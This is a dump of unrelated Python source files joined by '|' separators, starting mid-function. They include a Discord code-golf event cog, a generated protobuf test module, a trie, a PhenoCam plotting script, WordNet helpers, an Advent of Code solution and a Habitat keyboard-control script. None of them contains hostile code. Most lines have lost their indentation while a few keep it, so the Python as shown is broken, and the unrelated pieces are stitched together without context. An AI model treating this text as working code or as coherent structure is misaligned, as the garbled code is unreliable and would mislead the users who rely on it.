threshold = max(input_threshold, len(option) / 2, 1)
if distance <= threshold:
options_by_distance[option] = distance
return sorted(
list(options_by_distance.keys()), key=lambda k: options_by_distance[k]
)
def lexical_distance(a, b):
"""
Computes the lexical distance between strings A and B.
The "distance" between two strings is given by counting the minimum number
of edits needed to transform string A into string B. An edit can be an
insertion, deletion, or substitution of a single character, or a swap of two
adjacent characters.
    This distance can be useful for detecting typos in input or sorting
    options by similarity.
@returns distance in number of edits
"""
    d = [[i] for i in range(len(a) + 1)]
    d_len = len(d)
for i in range(d_len):
for j in range(1, len(b) + 1):
if i == 0:
d[i].append(j)
else:
d[i].append(0)
for i in range(1, len(a) + 1):
for j in range(1, len(b) + 1):
cost = 0 if a[i - 1] == b[j - 1] else 1
d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
d[i][j] = min(d[i][j], d[i - 2][j - 2] + cost)
return d[len(a)][len(b)]
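# Illustrative example: options within the distance threshold are returned
# sorted by closeness to the input, the rest are filtered out.
#
#   >>> suggestion_list('cat', ['cart', 'dog', 'chat', 'table'])
#   ['cart', 'chat']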
|
import re
import io
import json
import asyncio
from urllib import request
from functools import partial
from datetime import datetime, timedelta
from collections import OrderedDict
import discord
from discord.ext import commands
import matplotlib.pyplot as plt
from matplotlib.ticker import StrMethodFormatter
from .utils import custom_errors, checkers, misc
from .utils.i18n import use_current_gettext as _
RE_EVENT_DATE = re.compile(r'(?<=event-date : )(\d{,2})/(\d{,2})/(\d{4})')
RE_EVENT_STATE = re.compile(r'(?<=event-state : )(\S+)')
RE_EVENT_NAME = re.compile(r'(?<=event-name : )(.+)')
RE_EVENT_AUTOTESTS_GROUP = re.compile(r'event-autotests : \[\[\n(.*)\n]]', re.MULTILINE | re.DOTALL)
RE_EVENT_AUTOTEST = re.compile(r'{(.*?)} : \[\s*(.*?)\s*]', re.MULTILINE | re.DOTALL)
RE_GET_CODE_PARTICIPATION = re.compile(r'(```)?(?:(\S*)\s)(\s*\S[\S\s]*)(?(1)```|)')
RE_ENDLINE_SPACES = re.compile(r' *\n')
CODE_CHANNEL_ID = 810511403202248754
with request.urlopen('https://emkc.org/api/v1/piston/versions') as r:
AVAILABLE_LANGUAGES: list = json.loads(r.read().decode('utf-8'))
LANGUAGES_EQUIVALENT = {
('node', 'typescript', 'deno'): 'javascript',
('cpp', 'c'): 'c++',
('nasm', 'nasm64'): 'nasm',
('python2', 'python3'): 'python'
}
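# The alias groups above map to the canonical language used for rankings: e.g.
# a participation submitted in 'node', 'typescript' or 'deno' competes in the
# 'javascript' category.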
def event_not_closed():
async def inner(ctx):
code_channel = ctx.bot.get_channel(CODE_CHANNEL_ID)
state = RE_EVENT_STATE.search(code_channel.topic).group()
if state == 'closed':
await ctx.bot.set_actual_language(ctx.author)
await ctx.send(_('There is no event right now, sorry !'), delete_after=5)
return False
return True
return commands.check(inner)
def event_not_ended():
async def inner(ctx):
code_channel = ctx.bot.get_channel(CODE_CHANNEL_ID)
state = RE_EVENT_STATE.search(code_channel.topic).group()
if state == 'ended':
await ctx.bot.set_actual_language(ctx.author)
            await ctx.send(_('The event has ended, sorry !'), delete_after=5)
return False
return True
return commands.check(inner)
class Event(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.code_channel_id = 810511403202248754
@commands.group(
name='event',
        description=_('Participate or get information about an event.'),
invoke_without_command=True
)
async def event(self, ctx):
if ctx.guild and ctx.channel.id not in self.bot.test_channels_id: # Not in dm or in tests channels
raise custom_errors.NotAuthorizedChannels(self.bot.test_channels_id)
embed = discord.Embed(
title=_("Use of /event"),
color=misc.Color.grey_embed().discord
)
for command in ctx.command.commands:
if command.hidden: continue
embed.add_field(name=f"** • {command.name} : {_(command.description)}**", value=f"`{command.usage}`", inline=False)
await ctx.send(embed=embed)
async def get_participations(self, user=None) -> (dict, list, dict):
code_channel = self.bot.get_channel(self.code_channel_id)
event_informations = self.get_informations()
datas = dict()
datas_global = []
user_infos = dict()
async for message in code_channel.history(limit=None, after=event_informations['date']):
if message.author.id != self.bot.user.id or not message.embeds: continue
fields = message.embeds[0].fields
try: code_author = self.bot.get_user(user_id := int(fields[0].value.split('|')[0])) or await self.bot.fetch_user(user_id)
except: continue
language = fields[1].value
length = int(fields[2].value)
date = datetime.fromisoformat(fields[3].value)
infos = (message, code_author, length, date)
if user and user.id == code_author.id:
user_infos[language] = infos
datas.setdefault(language, [])
datas[language].append(infos)
datas_global.append(infos)
        sort_key = lambda obj: obj[2:4]  # sort by length, then date
datas = {key: sorted(value, key=sort_key) for key, value in datas.items()}
datas_global = sorted(datas_global, key=sort_key)
return datas, datas_global, user_infos
def get_informations(self):
channel = self.bot.get_channel(CODE_CHANNEL_ID)
state = RE_EVENT_STATE.search(channel.topic).group()
day, month, year = RE_EVENT_DATE.search(channel.topic).groups()
        date = datetime(int(year), int(month), int(day)) - timedelta(days=1)  # back up one day so history(after=date) includes the event's first day
name = RE_EVENT_NAME.search(channel.topic).group()
autotests_group = RE_EVENT_AUTOTESTS_GROUP.search(channel.topic).group()
autotests = RE_EVENT_AUTOTEST.findall(autotests_group)
return {'state': state, 'date': date, 'name': name, 'autotests': autotests}
async def edit_informations(self, state=None, date=None, name=None):
channel: discord.TextChannel = self.bot.get_channel(CODE_CHANNEL_ID)
new_topic = channel.topic
if state:
new_topic = RE_EVENT_STATE.sub(state, new_topic)
if date:
new_topic = RE_EVENT_DATE.sub(date.strftime("%d/%m/%Y"), new_topic)
if name:
new_topic = RE_EVENT_NAME.sub(name, new_topic)
await channel.edit(topic=new_topic)
@event.command(
name="participate",
description=_("Participate to the contest !"),
usage="/event participate {code}"
)
@commands.dm_only()
@event_not_ended()
@event_not_closed()
async def participate(self, ctx, *, code):
code_channel = self.bot.get_channel(self.code_channel_id)
re_match = RE_GET_CODE_PARTICIPATION.search(code)
if not re_match:
            raise commands.CommandError(_('Your message must contain a block of code (with the code language) ! *look `/tag discord markdown`*'))
language, code = re_match.groups()[1:]
code = code.strip()
if len(code) > 1000:
return await ctx.send(_("Looks like your code is too long! Try to remove the useless parts, the goal is to have a short and optimized code!"))
language = discord.utils.find(lambda i: language.lower() in i['aliases'], AVAILABLE_LANGUAGES)
if not language:
            return await ctx.send(_('Your language does not seem to be valid for the event.'))
__, __, user_infos = await self.get_participations(user=ctx.author)
old_participation: discord.Message = obj[0] if (obj := user_infos.get(language['name'])) else None
aliased_language = discord.utils.find(lambda couple: language['name'] in couple[0], LANGUAGES_EQUIVALENT.items())
if aliased_language:
language = discord.utils.find(lambda i: aliased_language[1] == i['name'], AVAILABLE_LANGUAGES) or language
valid_message = await ctx.send(_('**This is your participation :**\n\n') +
_('`Language` -> `{0}`\n').format(language['name']) +
_('`Length` -> `{0}`\n').format(len(code)) +
f'```{language["name"]}\n{code}```\n' +
                                       _('Do you want to post it ? ✅ ❌'))
self.bot.loop.create_task(misc.add_reactions(valid_message, ['✅', '❌']))
try: reaction, user = await self.bot.wait_for('reaction_add', check=lambda react, usr: not usr.bot and react.message.id == valid_message.id and str(react.emoji) in ['✅', '❌'], timeout=120)
except asyncio.TimeoutError: return
if str(reaction.emoji) == '✅':
event_informations = self.get_informations()
if autotests := event_informations['autotests']:
embed = discord.Embed(title=_('<a:typing:832608019920977921> Your code is passing some tests...'),
description='\n'.join(f'➖ Test {i+1}/{len(autotests)}' for i in range(len(autotests))),
color=misc.Color.grey_embed().discord)
testing_message: discord.Message = await ctx.send(embed=embed)
for i, (args, result) in enumerate(autotests):
try: execution_result = await misc.execute_piston_code(language['name'], code, args=args.split('|'))
except Exception: return await testing_message.edit(content=_('An error occurred.'))
if error_message := execution_result.get('stderr'):
                        embed.title = _('Your code exited with an error.')
embed.description = f'```\n{error_message[:2000]}\n```'
embed.colour = misc.Color(255, 100, 100).discord
return await testing_message.edit(embed=embed)
stdout = execution_result['stdout'].strip()
stdout = RE_ENDLINE_SPACES.sub('\n', stdout)
if stdout != result:
embed.title = _("Your code didn't pass all the tests. If you think it's an error, please contact a staff.")
embed.colour = misc.Color(255, 100, 100).discord
description_lines = embed.description.split('\n')
description_lines[i] = f'❌ Test {i+1}/{len(autotests)}'
embed.description = '\n'.join(description_lines)
return await testing_message.edit(embed=embed)
description_lines = embed.description.split('\n')
description_lines[i] = f'✅ Test {i + 1}/{len(autotests)}'
embed.description = '\n'.join(description_lines)
await testing_message.edit(embed=embed)
await asyncio.sleep(1)
embed.title = _('All tests passed successfully.')
embed.colour = misc.Color(100, 255, 100).discord
await testing_message.edit(embed=embed)
embed = discord.Embed(
title="Participation :",
color=misc.Color.grey_embed().discord
)
embed.add_field(name='User', value=f'{ctx.author.id}|{ctx.author.mention}', inline=False)
embed.add_field(name='Language', value=language['name'], inline=True)
embed.add_field(name='Length', value=str(len(code)), inline=True)
embed.add_field(name='Date', value=str(datetime.now().isoformat()), inline=False)
embed.add_field(name='Code', value=f"```{language['name']}\n{code}\n```", inline=False)
if old_participation:
await old_participation.edit(embed=embed)
await old_participation.clear_reactions()
response = _("Your entry has been successfully modified !")
else:
await code_channel.send(embed=embed)
response = _("Your entry has been successfully sent !")
try: await ctx.send(response)
except: pass
else:
try: await ctx.send(_('Cancelled'))
except: pass # prevent error if the user close his MP
@event.command(
name='cancel',
description=_('Remove your participation from the contest'),
usage="/event cancel"
)
@event_not_ended()
@event_not_closed()
async def cancel(self, ctx):
if ctx.guild and ctx.channel.id not in self.bot.test_channels_id: # Not in dm or in tests channels
raise custom_errors.NotAuthorizedChannels(self.bot.test_channels_id)
__, __, user_infos = await self.get_participations(user=ctx.author)
if not user_infos:
return await ctx.send(_("You didn't participate !"))
if len(user_infos) == 1:
old_participation: discord.Message = list(user_infos.values())[0][0]
else:
reactions = ['0️⃣', '1️⃣', '2️⃣', '3️⃣', '4️⃣', '5️⃣', '6️⃣', '7️⃣', '8️⃣', '9️⃣']
selectable = OrderedDict(user_infos)
message = await ctx.send(_("__Choose which participation you want to cancel :__\n")+'\n'.join([f"{reactions[i]} - `{language}`" for i, language in enumerate(selectable.keys())]))
self.bot.loop.create_task(misc.add_reactions(message, reactions[:len(selectable)]))
try:
reaction, __ = await self.bot.wait_for('reaction_add', timeout=120,
check=lambda react, usr: str(react.emoji) in reactions[:len(selectable)] and usr.id == ctx.author.id and react.message.id == message.id)
except TimeoutError:
try: await message.delete()
except: pass
return
try: await message.clear_reactions()
except: pass
old_participation: discord.Message = list(user_infos.values())[reactions.index(str(reaction.emoji))][0]
await old_participation.delete()
await ctx.send(_('Your participation has been successfully deleted'))
@event.command(
name="stats",
description=_("Get some stats about the current contest"),
usage="/event stats"
)
@event_not_closed()
async def stats(self, ctx):
if ctx.guild and ctx.channel.id not in self.bot.test_channels_id: # Not in dm or in tests channels
raise custom_errors.NotAuthorizedChannels(self.bot.test_channels_id)
datas, datas_global, user_infos = await self.get_participations(ctx.author)
if not datas:
return await ctx.send(_("There is no participation at the moment."))
embed = discord.Embed(
            title=_('Some information...'),
color=misc.Color.grey_embed().discord,
description=_('**Number of participations :** {}\n\u200b').format(len(datas_global))
)
for language, data in user_infos.items():
global_ranking = datas_global.index(data) + 1
language_ranking = datas[language].index(data) + 1
formatted_informations = _("• Global ranking : **{}** *({} > you > {})*\n").format(
global_ranking,
datas_global[global_ranking][2] if len(datas_global) > global_ranking else _('nobody'),
datas_global[global_ranking - 2][2] if global_ranking - 1 else _('nobody') # if rang index isn't 0
)
formatted_informations += _("• By language ranking : **{}** *({} > you > {})*").format(
language_ranking,
datas[language][language_ranking][2] if len(datas[language]) > language_ranking else _('nobody'),
datas[language][language_ranking - 2][2] if language_ranking - 1 else _('nobody') # if rang index isn't 0
)
embed.add_field(name=_('Your participation with {}').format(language),
value=formatted_informations,
inline=False)
embed.set_image(url="attachment://graph.png")
fn = partial(self.create_graph_bars, datas, _("Breakdown by languages used."))
final_buffer = await self.bot.loop.run_in_executor(None, fn)
file = discord.File(filename="graph.png", fp=final_buffer)
await ctx.channel.send(embed=embed, file=file)
@staticmethod
    def create_graph_bars(datas, title):  # title passed as an argument because translations don't work in a separate thread
fig, ax = plt.subplots()
langs = datas.keys()
values = [len(v) for v in datas.values()]
ax.bar(langs, values,
color=misc.Color(10, 100, 255, 0.5).mpl,
edgecolor=misc.Color(10, 100, 255).mpl,
linewidth=5)
ax.yaxis.set_major_formatter(StrMethodFormatter('{x:,.0f}')) # No decimal places
ax.set_yticks(range(1, max(values) + 1))
ax.set_title(title)
buff = io.BytesIO()
fig.savefig(buff)
buff.seek(0)
del fig
return buff
@event.command(
name='start',
usage='/event start <event_name>',
hidden=True
)
@checkers.is_high_staff()
async def start(self, ctx, *, name):
code_channel: discord.TextChannel = self.bot.get_channel(self.code_channel_id)
await self.edit_informations(state='open', date=datetime.now(), name=name)
await ctx.send(f'Event `{name}` started ! Participations are now open !')
await code_channel.send('```diff\n'
f'- {name.upper()}\n'
'```')
@event.command(
name='stop',
usage='/event stop',
hidden=True
)
@checkers.is_high_staff()
async def stop(self, ctx):
await self.edit_informations(state='ended')
event_informations = self.get_informations()
datas, datas_global, *__ = await self.get_participations()
medals = ['🥇', '🥈', '🥉']
formatted_text = ("```diff\n"
"- GLOBAL RANKING\n"
"```\n"
"{0}\n\n"
"```diff\n"
"- RANKING BY LANGUAGE\n"
"```\n")
formatted_text = formatted_text.format(
'\n'.join(
" {medal} {obj[1].mention} ({obj[1]}) - {obj[2]} chars".format(medal=medals[i], obj=datas_global[i]) for i in range(min(3, len(datas_global)))
)
)
for language, data in datas.items():
formatted_text += ("> ```diff\n"
f"> + {language.upper()}\n"
"> ```\n")
for i in range(min(len(data), 3)):
formatted_text += f"> {medals[i]} {data[i][1].mention} ({data[i][1]}) - {data[i][2]} chars\n"
formatted_text += '\n'
buffer = io.StringIO(formatted_text)
buffer.seek(0)
await ctx.send(f"Event `{event_informations['name']}` is now ended ! Participations are closed !", file=discord.File(buffer, 'ranking.txt'))
@event.command(
name='close',
usage='/event close',
hidden=True
)
@checkers.is_high_staff()
async def close(self, ctx):
await self.edit_informations(state='closed')
event_informations = self.get_informations()
await ctx.send(f"Event `{event_informations['name']}` is now closed !")
def setup(bot):
bot.add_cog(Event(bot))
|
# -*- coding: utf-8 -*-
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/protobuf/internal/file_options_test.proto
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from google.protobuf import descriptor_pb2 as google_dot_protobuf_dot_descriptor__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='google/protobuf/internal/file_options_test.proto',
package='google.protobuf.python.internal',
syntax='proto2',
serialized_options=None,
serialized_pb=b'\n0google/protobuf/internal/file_options_test.proto\x12\x1fgoogle.protobuf.python.internal\x1a google/protobuf/descriptor.proto\"\x1e\n\nFooOptions\x12\x10\n\x08\x66oo_name\x18\x01 \x01(\t:a\n\x0b\x66oo_options\x12\x1c.google.protobuf.FileOptions\x18\xac\xec\xb6\x39 \x01(\x0b\x32+.google.protobuf.python.internal.FooOptions'
,
dependencies=[google_dot_protobuf_dot_descriptor__pb2.DESCRIPTOR,])
FOO_OPTIONS_FIELD_NUMBER = 120436268
foo_options = _descriptor.FieldDescriptor(
name='foo_options', full_name='google.protobuf.python.internal.foo_options', index=0,
number=120436268, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=True, extension_scope=None,
serialized_options=None, file=DESCRIPTOR)
_FOOOPTIONS = _descriptor.Descriptor(
name='FooOptions',
full_name='google.protobuf.python.internal.FooOptions',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='foo_name', full_name='google.protobuf.python.internal.FooOptions.foo_name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto2',
extension_ranges=[],
oneofs=[
],
serialized_start=119,
serialized_end=149,
)
DESCRIPTOR.message_types_by_name['FooOptions'] = _FOOOPTIONS
DESCRIPTOR.extensions_by_name['foo_options'] = foo_options
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
FooOptions = _reflection.GeneratedProtocolMessageType('FooOptions', (_message.Message,), {
'DESCRIPTOR' : _FOOOPTIONS,
'__module__' : 'google.protobuf.internal.file_options_test_pb2'
# @@protoc_insertion_point(class_scope:google.protobuf.python.internal.FooOptions)
})
_sym_db.RegisterMessage(FooOptions)
foo_options.message_type = _FOOOPTIONS
google_dot_protobuf_dot_descriptor__pb2.FileOptions.RegisterExtension(foo_options)
# @@protoc_insertion_point(module_scope)
|
print("Enter the number of rows: ")
rows = int(input())
i = rows
count = 0
flag = 1
while i >= 1:
j = rows
while j > i:
# display space
print(' ', end=' ')
j -= 1
k = 1
while k <= i:
print(flag, end=' ')
k += 1
        flag += 1
        count += 1
print()
i -= 1
# OUTPUT
# Enter the number of rows:
# 5
# 1 2 3 4 5
# 6 7 8 9
# 10 11 12
# 13 14
# 15
|
# Program for Trie Insert and Search
# Trie node
class TrieNode:
def __init__(self):
self.children = [None]*26
self.isEndOfWord = False
# Trie Class
class Trie:
def __init__(self):
self.root = self.getNode()
def getNode(self):
return TrieNode()
def toIndex(self, ch):
return ord(ch)-ord('a')
# Function to Insert into Trie
def insert(self, key):
node = self.root
length = len(key)
for i in range(length):
idx = self.toIndex(key[i])
if not node.children[idx]:
node.children[idx] = self.getNode()
node = node.children[idx]
node.isEndOfWord = True
# Function for Trie Search
def search(self, key):
node = self.root
length = len(key)
for i in range(length):
idx = self.toIndex(key[i])
if not node.children[idx]:
return False
node = node.children[idx]
        return node is not None and node.isEndOfWord
# Main function
# To test code, please edit keys list and print statements for search
def main():
keys = ["the","apple","there","hello","world", "by","python"]
output = ["Not present in trie", "Present in trie"]
# Construct Trie
trie = Trie()
for key in keys:
trie.insert(key)
# Search in trie
print("{} => {}".format("the", output[trie.search("the")]))
print("{} => {}".format("hi", output[trie.search("hi")]))
print("{} => {}".format("apple", output[trie.search("apple")]))
print("{} => {}".format("man", output[trie.search("man")]))
if __name__ == '__main__':
main()
## Sample Output ##
# the => Present in trie
# hi => Not present in trie
# apple => Present in trie
# man => Not present in trie
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Command line script to make a simple PDF plot of gcc vs datetime using
the roistats file for a particular site and ROI.
"""
from __future__ import absolute_import
from __future__ import print_function
import argparse
import os
import pandas as pd
from matplotlib import pyplot as plt
from . import config
plt.style.use("ggplot")
archive_dir = config.archive_dir
MIN_SUN_ANGLE = config.MIN_SUN_ANGLE
MAX_BRT = config.MAX_BRT
MIN_BRT = config.MIN_BRT
def main():
"""
Use pandas to generate plot of gcc values from roistats file.
"""
# set up command line argument processing
parser = argparse.ArgumentParser()
# options
parser.add_argument(
"-v",
"--verbose",
help="increase output verbosity",
action="store_true",
default=False,
)
# positional arguments
parser.add_argument("site", help="PhenoCam site name")
parser.add_argument("roiname", help="ROI name, e.g. DB_0001")
# get args
args = parser.parse_args()
sitename = args.site
roiname = args.roiname
verbose = args.verbose
if verbose:
print("site: {0}".format(sitename))
print("roiname: {0}".format(roiname))
print("verbose: {0}".format(verbose))
# set roistats input filename
inname = "{}_{}_roistats.csv".format(sitename, roiname)
indir = os.path.join(archive_dir, sitename, "ROI")
inpath = os.path.join(indir, inname)
# set 3-day summary input filename
inname2 = "{}_{}_3day.csv".format(sitename, roiname)
inpath2 = os.path.join(indir, inname2)
# set output filename
outname = "{}_{}_roistats.pdf".format(sitename, roiname)
outdir = os.path.join(archive_dir, sitename, "ROI")
outpath = os.path.join(outdir, outname)
if verbose:
print("archive dir: {}".format(archive_dir))
print("ROI dir: {}".format(outdir))
print("ROI stats file: {}".format(inname))
print("3-day summary file: {}".format(inname2))
print("output file: {}".format(outname))
# read in roistats CSV file
df = pd.read_csv(inpath, comment="#", parse_dates=[[0, 1]])
# index data frame by datetime
df.index = df.date_local_std_time
# add a column for ROI brightness (r_mean + g_mean + b_mean)
df["brt"] = df["r_mean"] + df["g_mean"] + df["b_mean"]
# for the gcc percentiles we filter data first
#
# NOTE: should use vegindex routines to read the ROI list
# which should pick up any overrides of the defaults!
#
df_low = df[df.solar_elev < MIN_SUN_ANGLE]
df_day = df[df.solar_elev >= MIN_SUN_ANGLE]
df_brt_filtered = df_day[(df_day.brt < MIN_BRT) | (df_day.brt > MAX_BRT)]
df_good = df_day[(df_day.brt >= MIN_BRT) & (df_day.brt <= MAX_BRT)]
df_filtered = pd.concat([df_low, df_brt_filtered])
nrows_filtered, ncols = df_filtered.shape
# read in 3-day summary filename
df2 = pd.read_csv(inpath2, comment="#", parse_dates=[0])
df2.index = df2.date
# make plot
ax = df_good.gcc.plot(style="k.", markersize=0.3, figsize=[16, 5])
if nrows_filtered > 0:
df_filtered.gcc.plot(style="r.", ax=ax, markersize=0.5)
df2.gcc_90.plot(style="g-", ax=ax)
ax.set_title("{} {}".format(sitename, roiname))
ax.set_ylabel("gcc")
ax.set_xlabel("date")
lines, labels = ax.get_legend_handles_labels()
if nrows_filtered > 0:
ax.legend(
lines[1:], ["filtered values", "3-day gcc 90th percentile"], loc="best"
)
else:
ax.legend(lines[1:], ["3-day gcc 90th percentile"], loc="best")
fig = ax.get_figure()
fig.savefig(outpath)
if __name__ == "__main__":
main()
|
>>> basket = ['apple', 'orange', 'apple',
...           'pear', 'orange', 'banana']
>>> fruit = set(basket) # create a set
>>> fruit
set(['orange', 'pear', 'apple', 'banana'])
>>> 'orange' in fruit # fast membership testing
True
>>> 'crabgrass' in fruit
False
|
from nltk.corpus import wordnet as wn
class WordnetHandler():
def get_synonyms(self, word):
#print('in syns', word)
s = wn.synsets(word)
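        # str(syn) looks like "Synset('dog.n.01')"; the [8:-7] slice keeps only
        # the lemma ("dog"), dropping the part of speech and sense number.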
syns = [str(syn)[8:-7] for syn in s]
unique_syns = list(set(syns))
return unique_syns
def get_hypernyms(self, word):
"""
"domestic animal" is a hypernym of "dog"
:return:
"""
s = wn.synsets(word)
        # guard against an empty synset list, otherwise s[0] raises IndexError
hypers = [str(hyper)[8:-7] for hyper in s[0].hypernyms()] if s else []
return hypers
def get_hyponyms(self, word):
"""
"dalmatian" is a hyponym of "dog"
:return:
"""
s = wn.synsets(word)
hypos = [str(hypo)[8:-7] for hypo in s[0].hyponyms()] if s else []
        return hypos
|
import numpy as np
class Conv1dObservation(object):
def __init__(self, non_lidar_obs, lidar_obs):
"""
:type non_lidar_obs: np.ndarray
:type lidar_obs: np.ndarray
"""
assert len(non_lidar_obs.shape) == 1
assert len(lidar_obs.shape) == 2
self._non_lidar_obs = non_lidar_obs
self._lidar_obs = lidar_obs
def __len__(self):
return self._non_lidar_obs.shape[0] + self._lidar_obs.shape[0]*self._lidar_obs.shape[1]
@property
def non_lidar_obs(self):
return self._non_lidar_obs
@property
def lidar_obs(self):
return self._lidar_obs
# @property
# def obs(self):
# return self._non_lidar_obs, self._lidar_obs
@property
def flatten(self):
return np.concatenate((self._non_lidar_obs, self._lidar_obs.flatten()), axis=None)
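    # Illustrative example: for non_lidar_obs of shape (5,) and lidar_obs of
    # shape (16, 2), len(obs) == 5 + 16*2 == 37 and obs.flatten has shape (37,).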
@property
def shape(self):
        return self._non_lidar_obs.shape, self._lidar_obs.shape
|
#!/usr/bin/env python3
import collections
import datetime
import itertools
import operator
import sys
records = [(datetime.datetime.strptime(r[0], '[%Y-%m-%d %H:%M'), r[1])
for r in map(lambda line: line.rstrip().split(sep='] '), sys.stdin)]
# Sort by time to assign each event to a guard.
records.sort(key=operator.itemgetter(0))
nap_deltas = collections.defaultdict(lambda: [0] * 60)
guard = None
for time, msg in records:
if msg.startswith('Guard'):
guard = int(msg[7:].split()[0])
elif msg.startswith('falls'):
nap_deltas[guard][time.minute] += 1
else:
nap_deltas[guard][time.minute] -= 1
# Integrate nap-deltas per minute to get naps per minute.
naps = [(guard, list(itertools.accumulate(deltas)))
for guard, deltas in nap_deltas.items()]
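# Example: a guard who falls asleep at minute 5 and wakes at minute 30
# contributes +1 at index 5 and -1 at index 30; accumulating the deltas
# yields 1 for minutes 5..29 and 0 elsewhere.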
guard, minutes = max(naps, key=lambda g: sum(g[1]))
mode, count = max(enumerate(minutes), key=operator.itemgetter(1))
print(guard * mode)
|
"""
This file contains the implementation of the class Player.
Author: Alejandro Mujica ([email protected])
Date: 07/21/20
"""
from src.states.entities import player as player_states
from src.entity import Entity
import settings
class Player(Entity):
def __init__(self, x, y, game_level):
super(Player, self).__init__(
x, y, settings.PLAYER_WIDTH, settings.PLAYER_HEIGHT, 'martian',
game_level,
states={
'idle': lambda sm: player_states.IdleState(self, sm),
'walk': lambda sm: player_states.WalkState(self, sm),
'jump': lambda sm: player_states.JumpState(self, sm),
'fall': lambda sm: player_states.FallState(self, sm),
},
animations={
'idle': {
'frames': [0]
},
'walk': {
'frames': [9, 10],
'interval': 0.15
},
'jump': {
'frames': [2]
}
}
)
self.score = 0
self.coin_counter = {
'yellow': 0,
'red': 0,
'blue': 0,
'green': 0
}
self.dead = False
|
'''
Package definition for 'soane.items'.
'''
from soane.items.book import Book
from soane.items.note import Note
|
"""Example ox_herd plugins used by our app
"""
import requests
# Import base class so we can create plugins
from ox_herd.core.plugins import base
class CheckWeb(base.OxPlugTask):
"""Class to check on a web site.
    This is mainly meant to serve as an example of a minimal plugin.
All we do is implement the main_call method.
"""
@classmethod
def main_call(cls, ox_herd_task):
"""Main method to check if web site is accesible.
:arg ox_herd_task: Instance of a CheckWeb task perhaps containing
additional data (e.g., ox_herd_task.name). If your
main_call does not need arguments, you can basically
just ignore ox_herd_task. If you do want to be able
to pass in arguments, see a more detailed discussion
of how to get arguments from the user and configure
a task in the full plugin documentation.
~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-
:returns: Dictionary with 'return_value' and 'json_blob' as
required for OxPluginComponent.
~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-~-
PURPOSE: Check if website is live.
"""
url = 'http://github.com'
result = requests.get(url)
        return {
            'return_value': 'Status=%s for checking url %s' % (
                result.status_code, url)
        }
|
import habitat
from habitat.sims.habitat_simulator.actions import HabitatSimActions
import cv2
import envs.spring_env
import numpy as np
from PIL import Image
from habitat_sim.utils.common import d3_40_colors_rgb
import os, glob
import json
import argparse
import quaternion
from scipy.spatial.transform import Rotation
import sims.actions
FORWARD_KEY="w"
LEFT_KEY="a"
RIGHT_KEY="d"
FINISH="f"
LOOK_UP_KEY="u"
LOOK_DOWN_KEY="j"
STRAFE_LEFT_KEY="n"
STRAFE_RIGHT_KEY="m"
def transform_rgb_bgr(image):
return image[:, :, [2, 1, 0]]
def extract_semantic_image(observations):
semantic_img = Image.new("P", (observations['semantic'].shape[1], observations['semantic'].shape[0]))
semantic_img.putpalette(d3_40_colors_rgb.flatten())
semantic_img.putdata((observations['semantic'].flatten() % 40).astype(np.uint8))
semantic_img = semantic_img.convert("RGB")
semantic_img = np.array(semantic_img)
print(observations["agent_state"])
return semantic_img
def show_observations(observations):
print("Destination, distance: {:3f}, theta(radians): {:.2f}".format(
observations["pointgoal_with_gps_compass"][0],
observations["pointgoal_with_gps_compass"][1]))
numpy_horizontal1 = np.hstack((transform_rgb_bgr(observations["rgb"]), transform_rgb_bgr(observations["rgb1"])))
semantic_img = extract_semantic_image(observations)
depth_image = np.stack((observations['depth'], observations['depth'], observations['depth']), axis=2)[:, :, :, 0]
depth_image = (255*depth_image).astype(np.uint8)
numpy_horizontal2 = np.hstack((semantic_img, depth_image))
numpy_vertical = np.vstack((numpy_horizontal1, numpy_horizontal2))
cv2.imshow("RGB+RGB1+SEMANTIC+DEPTH", numpy_vertical)
def get_action(keystroke):
action = None
if keystroke == ord(FORWARD_KEY):
action = HabitatSimActions.MOVE_FORWARD
print("action: FORWARD")
elif keystroke == ord(LEFT_KEY):
action = HabitatSimActions.TURN_LEFT
print("action: LEFT")
elif keystroke == ord(RIGHT_KEY):
action = HabitatSimActions.TURN_RIGHT
print("action: RIGHT")
elif keystroke == ord(FINISH):
action = HabitatSimActions.STOP
print("action: FINISH")
elif keystroke == ord(LOOK_UP_KEY):
action = HabitatSimActions.LOOK_UP
print("action: LOOK_UP")
elif keystroke == ord(LOOK_DOWN_KEY):
action = HabitatSimActions.LOOK_DOWN
print("action: LOOK_DOWN")
elif keystroke == ord(STRAFE_LEFT_KEY):
action = HabitatSimActions.STRAFE_LEFT
print("action: STRAFE_LEFT")
elif keystroke == ord(STRAFE_RIGHT_KEY):
action = HabitatSimActions.STRAFE_RIGHT
print("action: STRAFE_RIGHT")
else:
print("INVALID KEY")
return action
def add_strafe_actions(config):
HabitatSimActions.extend_action_space("STRAFE_LEFT")
HabitatSimActions.extend_action_space("STRAFE_RIGHT")
config.defrost()
config.TASK.POSSIBLE_ACTIONS = config.TASK.POSSIBLE_ACTIONS + [
"STRAFE_LEFT",
"STRAFE_RIGHT",
]
config.TASK.ACTIONS.STRAFE_LEFT = habitat.config.Config()
config.TASK.ACTIONS.STRAFE_LEFT.TYPE = "StrafeLeft"
config.TASK.ACTIONS.STRAFE_RIGHT = habitat.config.Config()
config.TASK.ACTIONS.STRAFE_RIGHT.TYPE = "StrafeRight"
config.SIMULATOR.ACTION_SPACE_CONFIG = "NoNoiseStrafe"
config.freeze()
